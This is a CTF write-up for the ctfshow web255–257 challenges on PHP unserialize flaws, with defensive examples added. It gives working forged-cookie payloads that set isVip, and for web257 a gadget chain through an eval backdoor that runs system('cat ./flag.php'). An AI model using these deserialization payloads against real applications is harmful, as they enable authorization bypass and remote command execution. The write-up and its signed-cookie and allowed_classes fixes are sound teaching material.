ctfshow web255 web 256 web257
2022-07-04 08:15:00 【Jiang Xiaozi】
web255
The attached code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}
The overall idea is almost the same as in the previous challenge; the only difference is one additional line:
$user = unserialize($_COOKIE['user']);
unserialize performs deserialization, so we need to serialize an object ourselves and pass it in through the user cookie to change this data.
public function login($u,$p){
    return $this->username===$u&&$this->password===$p;
}
This code cannot set isVip to true, so we need to change the value of isVip through the user variable.
Only the class definition is needed: only the class and its variables take part in serialization and deserialization, so everything else can be removed.
<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=true;
}
echo(urlencode(serialize(new ctfShowUser())));
?>
So the input parameter is
Got the flag. See you!!
web256
The attached code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                echo "your flag is ".$flag;
            }
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}
The key point of this challenge is that username and password must not be equal. Because the comparisons are all strict, passing different values for username and password is enough. Note that the username and password of the user object in the cookie need to be changed as well.
So this time we pass in:
?username=1&password=2
<?php
class ctfShowUser{
    public $username='1';
    public $password='2';
    public $isVip=true;
}
echo(urlencode(serialize(new ctfShowUser())));
?>
O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%222%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
Got the flag. See you!
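web255 and web256 both work because the server takes isVip, username and password from an object the client controls. The following added example (not the challenge's code) shows one way to keep such state tamper-evident: JSON claims with an HMAC instead of unserialize(). SECRET_KEY, the function names and the claim layout are assumptions.

```php
<?php
// Added example, not the challenge's code. SECRET_KEY and the claim names
// ('username', 'isVip') are assumptions chosen to mirror the challenge.
const SECRET_KEY = 'placeholder-load-a-random-key-from-server-config';

// Cookie value = base64(JSON claims) . "." . HMAC-SHA256 of the base64 text.
function issueUserCookie(array $claims): string {
    $body = base64_encode(json_encode($claims));
    return $body . '.' . hash_hmac('sha256', $body, SECRET_KEY);
}

// Returns the claims, or null when the value is malformed or was modified.
function readUserCookie(string $cookie): ?array {
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$body, $mac] = $parts;
    // Constant-time comparison of the expected and supplied MAC.
    if (!hash_equals(hash_hmac('sha256', $body, SECRET_KEY), $mac)) {
        return null;
    }
    // json_decode builds only arrays and scalars; no class is instantiated.
    $claims = json_decode((string) base64_decode($body, true), true);
    if (!is_array($claims)
        || !is_string($claims['username'] ?? null)
        || !is_bool($claims['isVip'] ?? null)) {
        return null;
    }
    return $claims;
}

// Constructed demo values: a cookie issued by the server verifies.
$cookie = issueUserCookie(['username' => 'alice', 'isVip' => false]);
var_dump(readUserCookie($cookie));

// The client swaps in claims with isVip=true but cannot recompute the MAC,
// so verification fails and the claims are discarded.
[, $oldMac] = explode('.', $cookie, 2);
$forged = base64_encode(json_encode(['username' => 'alice', 'isVip' => true]));
var_dump(readUserCookie($forged . '.' . $oldMac));

// A PHP-serialized object like the challenge cookie is rejected as malformed.
var_dump(readUserCookie('O:11:"ctfShowUser":0:{}'));
```

Keeping the user record and the VIP flag in a server-side session, with only a session ID in the cookie, avoids the problem entirely.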
web257
The attached code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }
}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}
This challenge starts to involve the magic methods of deserialization. I have previously written an article introducing the common PHP magic methods used in deserialization.
Back to this challenge: in the end we need to use the eval call in the backDoor class to execute a command.
Building on the method from the previous challenge, take this one step by step. The __construct method is triggered when an object of the class is created; here it instantiates the info class. The __destruct method is triggered when the object is destroyed; it calls the getInfo method of the info object, which returns the value of user. The method we want to call in the backDoor class is also named getInfo(), so when building the serialized object we can change the class that __construct instantiates from info to backDoor. unserialize() itself does not call __construct, so the object held in the class property comes directly from the serialized data.
The implementation is as follows:
<?php
class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=true;
    private $class = 'info';

    public function __construct(){
        $this->class=new backDoor();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }
}

class backDoor{
    private $code='system("cat ./flag.php");';
    public function getInfo(){
        eval($this->code);
    }
}

echo(urlencode(serialize(new ctfShowUser())));
As usual
?username=xxxxxx&password=xxxxxx
Cookie: user=O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A1%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A25%3A%22system%28%22cat+.%2Fflag.php%22%29%3B%22%3B%7D%7D
Got the flag. See you!!
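The web257 chain depends on unserialize() instantiating whatever class the cookie names and then running __destruct on it. The following added example (not the challenge's code) compares the challenge's call pattern with unserialize()'s allowed_classes option. The classes are harmless stand-ins whose getInfo() only records that it was called, and CallLog and the sample cookie are constructed for the demonstration.

```php
<?php
// Added example, not the challenge's code. These classes are harmless stand-ins
// for the challenge's: getInfo() records that it ran instead of calling eval().
class CallLog { public static $calls = []; }

class info {
    public function getInfo() { CallLog::$calls[] = 'info::getInfo'; }
}
class backDoor {
    public function getInfo() { CallLog::$calls[] = 'backDoor::getInfo'; }
}
class ctfShowUser {
    public $class;
    public function __construct() { $this->class = new info(); }
    public function __destruct() { $this->class->getInfo(); }
}

// Constructed input: serialized ctfShowUser whose $class property names backDoor.
$cookie = 'O:11:"ctfShowUser":1:{s:5:"class";O:8:"backDoor":0:{}}';

// 1) Pattern from the challenge: every class named in the data is instantiated,
//    __construct is skipped, and __destruct runs on the client-chosen object.
$user = unserialize($cookie);
unset($user);
$withoutFilter = CallLog::$calls;

// 2) allowed_classes => false: objects become __PHP_Incomplete_Class, which has
//    no __destruct, so no method of ctfShowUser or backDoor is reached.
CallLog::$calls = [];
$user = unserialize($cookie, ['allowed_classes' => false]);
$accepted = $user instanceof ctfShowUser;
unset($user);
$withFilter = CallLog::$calls;

// Shows the calls recorded in each case and whether the object was accepted.
var_dump($withoutFilter, $accepted, $withFilter);
```

Restricting classes removes the gadget, but property values in an allowed class are still client-supplied, so authorization fields such as isVip must not be read from deserialized cookie data.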